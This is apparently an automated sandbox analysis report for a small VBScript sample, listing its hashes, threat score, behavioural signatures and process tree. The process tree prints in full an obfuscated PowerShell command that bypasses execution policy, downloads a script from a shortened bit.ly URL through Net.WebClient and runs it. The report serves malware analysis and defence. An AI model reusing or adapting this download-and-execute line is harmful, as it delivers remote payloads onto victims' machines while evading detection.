Analysis
-
max time kernel
7s -
max time network
56s -
platform
windows7_x64 -
resource
win7v20210408 -
submitted
25-07-2021 06:22
Static task
static1
Behavioral task
behavioral1
Sample
LUID618.vbs
Resource
win7v20210408
windows7_x64
0 signatures
0 seconds
General
-
Target
LUID618.vbs
-
Size
662B
-
MD5
a39f9093ecdceb92cf629cd5764dd1d2
-
SHA1
1942c681159cbbce82dc7388b0de29b984f43bd8
-
SHA256
83d832887ed1b0af95ca14e647463251f0c9660971fddb03d3959647d6faee4d
-
SHA512
c18fd694af943cdc74a0679fe43214afb9c652a5e53dca386e631d765449e64bff524809ef2a7923843272dc9040a080028e4f1709eb37b95723b14443521c1a
Score
8/10
Malware Config
Signatures
-
Blocklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 6 1528 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
Processes:
powershell.exepid process 1528 powershell.exe 1528 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 1528 powershell.exe -
Suspicious use of WriteProcessMemory 3 IoCs
Processes:
WScript.exedescription pid process target process PID 1980 wrote to memory of 1528 1980 WScript.exe powershell.exe PID 1980 wrote to memory of 1528 1980 WScript.exe powershell.exe PID 1980 wrote to memory of 1528 1980 WScript.exe powershell.exe
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\LUID618.vbs"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -exec Bypass gdr -*;Set-Variable 5 (&(Get-Item Variable:/E*t).Value.InvokeCommand.(((Get-Item Variable:/E*t).Value.InvokeCommand|Get-Member|?{(DIR Variable:/_).Value.Name-ilike'*ts'}).Name).Invoke('*w-*ct')Net.WebClient);Set-Variable S 'https://bit.ly/3x1bIxK'; (Get-Item Variable:/E*t).Value.InvokeCommand.InvokeScript((GCI Variable:5).Value.((((GCI Variable:5).Value|Get-Member)|?{(DIR Variable:/_).Value.Name-ilike'*wn*g'}).Name).Invoke((GV S -ValueO)))2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
memory/1528-60-0x0000000000000000-mapping.dmp
-
memory/1528-62-0x00000000022D0000-0x00000000022D1000-memory.dmpFilesize
4KB
-
memory/1528-63-0x000000001AD50000-0x000000001AD51000-memory.dmpFilesize
4KB
-
memory/1528-64-0x000000001A8C0000-0x000000001A8C1000-memory.dmpFilesize
4KB
-
memory/1528-65-0x000000001ACD0000-0x000000001ACD2000-memory.dmpFilesize
8KB
-
memory/1528-66-0x000000001ACD4000-0x000000001ACD6000-memory.dmpFilesize
8KB
-
memory/1528-67-0x00000000023B0000-0x00000000023B1000-memory.dmpFilesize
4KB
-
memory/1528-68-0x000000001A910000-0x000000001A911000-memory.dmpFilesize
4KB
-
memory/1528-69-0x000000001B600000-0x000000001B601000-memory.dmpFilesize
4KB
-
memory/1528-70-0x0000000002320000-0x0000000002321000-memory.dmpFilesize
4KB
-
memory/1528-71-0x000000001C390000-0x000000001C391000-memory.dmpFilesize
4KB
-
memory/1980-59-0x000007FEFB761000-0x000007FEFB763000-memory.dmpFilesize
8KB